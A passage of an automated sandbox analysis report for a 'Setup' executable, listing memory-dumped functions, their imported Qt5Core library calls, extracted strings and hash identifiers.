                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time@@$Date$Date@@$V0@@$A@$$Logger@@MessageQt@@@Spec@Time$?add?warning@Category@@Enabled@H00@LoggingSecs@V0@$$V1@_Warning
                                                                                                                                                              • String ID: unsupported date format detected
                                                                                                                                                              • API String ID: 2883579225-1123082746
                                                                                                                                                              • Opcode ID: 8e95d7910b4aa83a9a0375aefd62b3de104e9a5e53f57d19f7e05434a61ca39e
                                                                                                                                                              • Instruction ID: 99fd0e390512babf5f629f481cdea6a1bee71e3d64cbf9cda87a0f1ab343845a
                                                                                                                                                              • Opcode Fuzzy Hash: 8e95d7910b4aa83a9a0375aefd62b3de104e9a5e53f57d19f7e05434a61ca39e
                                                                                                                                                              • Instruction Fuzzy Hash: B7C1E3B2A0899689EB46CB34D4A46BC3B71FB91B4DF448126CB5E17654EE3C974ACF00
                                                                                                                                                              Function 00007FFBA19793A0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 130COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19793F5
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979403
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979444
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979454
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197946C
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979477
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979486
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979491
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794A0
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794AD
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794C8
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794D5
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197950D
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA1979524
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA1979545
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979556
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19795D6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?append@Meta$Type@@$ConverterFunction@$?register?typeName@$?ends?has?reserve@AbstractFlag@Flags@Init_thread_footerNormalizedObject@@@Private@@RegisteredString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QPair
                                                                                                                                                              • API String ID: 3686098034-1266515757
                                                                                                                                                              • Opcode ID: 258fe3c14583431596a06a15b64918aa195e569fecabf6f19ad2eccb6cf1fde0
                                                                                                                                                              • Instruction ID: 7423cb031808af4e90f632bbfd71476ad0bbbe5353d90d0711a2885a08b5c6c8
                                                                                                                                                              • Opcode Fuzzy Hash: 258fe3c14583431596a06a15b64918aa195e569fecabf6f19ad2eccb6cf1fde0
                                                                                                                                                              • Instruction Fuzzy Hash: D45110B1A0E64299E7929B30E8501B57761FF88BA4F804136DD6E476A4EF7CE449CF00
                                                                                                                                                              Function 00007FFBA19D1640 Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 91timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Byte$Array@@$?data@Char@@Mode@0@@ParsingVariant@@$?from?size@Array@@@DateLatin1String@@@Time@@Url@@@Utf8@V0@$$V0@@Valid@
                                                                                                                                                              • String ID: location
                                                                                                                                                              • API String ID: 3020387388-1587448267
                                                                                                                                                              • Opcode ID: 2811774e6af0c0036aedeebed4c548dd7e7140fcee784c1a54aa1b4ac10ad210
                                                                                                                                                              • Instruction ID: b2275e31404e3381ce83661412314f78907868f61a03b98ffdda37cf072ce351
                                                                                                                                                              • Opcode Fuzzy Hash: 2811774e6af0c0036aedeebed4c548dd7e7140fcee784c1a54aa1b4ac10ad210
                                                                                                                                                              • Instruction Fuzzy Hash: 64416CA2A09A0699EB419F30D8950FC2771FF5476CB805032DE1E469A8EF38D58ECB40
                                                                                                                                                              Function 00007FFBA1A21BC0 Relevance: 31.8, APIs: 21, Instructions: 332COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CC9
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CD5
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CE7
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CF3
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CFF
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21D0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?size@$?begin@$?end@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 943683178-0
                                                                                                                                                              • Opcode ID: bf87ce386bcb7862bbf0fafb5d936da23a7005c1a533e5f536341d85c5606809
                                                                                                                                                              • Instruction ID: 0eeb1fddab3be8ce8561cabc4347b189fa8709ad1760da6cebd26db05f32efcf
                                                                                                                                                              • Opcode Fuzzy Hash: bf87ce386bcb7862bbf0fafb5d936da23a7005c1a533e5f536341d85c5606809
                                                                                                                                                              • Instruction Fuzzy Hash: 8DE15CB2A0A642C2DF91DF35D64427863A6EF59B94F488033CE5E476A5FF2DE845CB00
                                                                                                                                                              Function 00007FFBA19B4BA0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 123timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$?data@Char@@Random$?_fill?cend@?from?global@?resize@?size@Base64@Data@DateDevice@@Generator64@@Generator@@Initialization@ObjectPrivate@@Qt@@@Range@Time@@V0@$$V0@@malloc
                                                                                                                                                              • String ID: boundary_.oOo._
                                                                                                                                                              • API String ID: 905285516-2978925420
                                                                                                                                                              • Opcode ID: 02d8ad101beaffff43c98f894d3bdcfe5a44328406f69fc441747eba4475c547
                                                                                                                                                              • Instruction ID: b49c4036c436fed30c1f2bcc4c742f74a46fa2412f5c4bc5313e2d015e4aa4d6
                                                                                                                                                              • Opcode Fuzzy Hash: 02d8ad101beaffff43c98f894d3bdcfe5a44328406f69fc441747eba4475c547
                                                                                                                                                              • Instruction Fuzzy Hash: 0A51B2B260EB4686DB919F31F8540A977A1FB88BA4B404136DE6E07768EF3CD549CF40
                                                                                                                                                              Function 00007FFBA1980B00 Relevance: 31.6, APIs: 21, Instructions: 104timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$V0@@$?size@$?index?mid@?trimmed@$?at@DateTime@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2136887296-0
                                                                                                                                                              • Opcode ID: 76539a83a88a1823223943e502d448cded87a93951f83dc45b57c0b48b5f1279
                                                                                                                                                              • Instruction ID: 127dbb6f378fbc3243eec9c6827ee5dc5345498214e39a30f9ff2a9481c5571a
                                                                                                                                                              • Opcode Fuzzy Hash: 76539a83a88a1823223943e502d448cded87a93951f83dc45b57c0b48b5f1279
                                                                                                                                                              • Instruction Fuzzy Hash: 7E416DA2B1DA4392EB91CF36E8444796761FB88B94F445032DE5E47A28EF3CD50ACF00
                                                                                                                                                              Function 00007FFBA19747D0 Relevance: 30.4, APIs: 20, Instructions: 370COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$??8@String@@0@$Data@@HashHash@@$Node@$?allocate?check?free?has?willArray@@ByteCountData@ExternalGrow@ObjectObject@@@Pointer@@SharedShared@Shrunk@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4176548242-0
                                                                                                                                                              • Opcode ID: 136f8c0ea6963a9cc93d0b6686e66454ff579d3b6d42251ff75841b5ab9a933f
                                                                                                                                                              • Instruction ID: 414f97c6b6740ed1b209843fafac3af232b9cb0ed2339f191c73b291d15743b4
                                                                                                                                                              • Opcode Fuzzy Hash: 136f8c0ea6963a9cc93d0b6686e66454ff579d3b6d42251ff75841b5ab9a933f
                                                                                                                                                              • Instruction Fuzzy Hash: D5F1B0B2B1AA9686EBD5DF25D4406BD27A5FF44B88F854036CE0E13395DF38E846CB10
                                                                                                                                                              Function 00007FFBA1992BF0 Relevance: 30.2, APIs: 20, Instructions: 183COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Char@@Ref@@String$?childChildEvent@Event@@@Object@@$?size@Url@@$?const?data@?host@?parseAddressComponentEnd@Flags@FormattingOption@Url@@@@@Utils@@V0@@$?index?mid@CaseChar@@1@Char@@@Ip4@Ip6@Latin1Qt@@@Sensitivity@String@@@V2@1@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4013561373-0
                                                                                                                                                              • Opcode ID: bfd4af2f7c933841985476364c77f30e290b478f4efdff319069d4f4ec53fd11
                                                                                                                                                              • Instruction ID: 125c71a445fa67b251148a16fc70a96a3817edded5d761abaa30d890919a812b
                                                                                                                                                              • Opcode Fuzzy Hash: bfd4af2f7c933841985476364c77f30e290b478f4efdff319069d4f4ec53fd11
                                                                                                                                                              • Instruction Fuzzy Hash: 86818EA2A0E94291EB929F35E4402BD6765FF84B98F444032DE4E476B5EF3CE54ACF40
                                                                                                                                                              Function 00007FFBA19DF4B0 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 67COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF4BD
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF500
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF50B
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF52C
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF537
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF558
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF563
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF584
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF58F
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF5B7
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF5C2
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ?lock@QMutex@@QEAAXXZ.QT5CORE ref: 00007FFBA19E3711
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E372D
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3744
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E375B
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3771
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3787
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E379D
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37B3
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37C9
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37E2
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37FB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Argument@@Connection@GenericMetaReturn$?connect@ConnectionQt@@@Type@$?lock@Mutex@@Routine@@Thread@Thread@@$?current?mainApplicationCoreLocker@@MutexPostPrivate@@V0@@
                                                                                                                                                              • String ID: 2configurationAdded(QNetworkConfiguration)$2configurationChanged(QNetworkConfiguration)$2configurationRemoved(QNetworkConfiguration)$2configurationUpdateComplete()$2onlineStateChanged(bool)$2updateCompleted()
                                                                                                                                                              • API String ID: 3599274470-3342877338
                                                                                                                                                              • Opcode ID: 1378942ae3c7f917c0a6b57e8ab0addd66fa07bfc41b0590342ab87847e52c3b
                                                                                                                                                              • Instruction ID: 3d8c03b114bf3013427ce8cfcc711af25d291aaac4adda31f7cc69f01ff16171
                                                                                                                                                              • Opcode Fuzzy Hash: 1378942ae3c7f917c0a6b57e8ab0addd66fa07bfc41b0590342ab87847e52c3b
                                                                                                                                                              • Instruction Fuzzy Hash: 8F3112B191DA4691DB518F21F8440A9B770FB89BA4F540133EEAD43668EF3CD649CF40
                                                                                                                                                              Function 00007FFBA1980DE0 Relevance: 28.6, APIs: 19, Instructions: 107timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980700
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198070E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198071C
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198072A
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980738
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980746
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980754
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198078E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980798
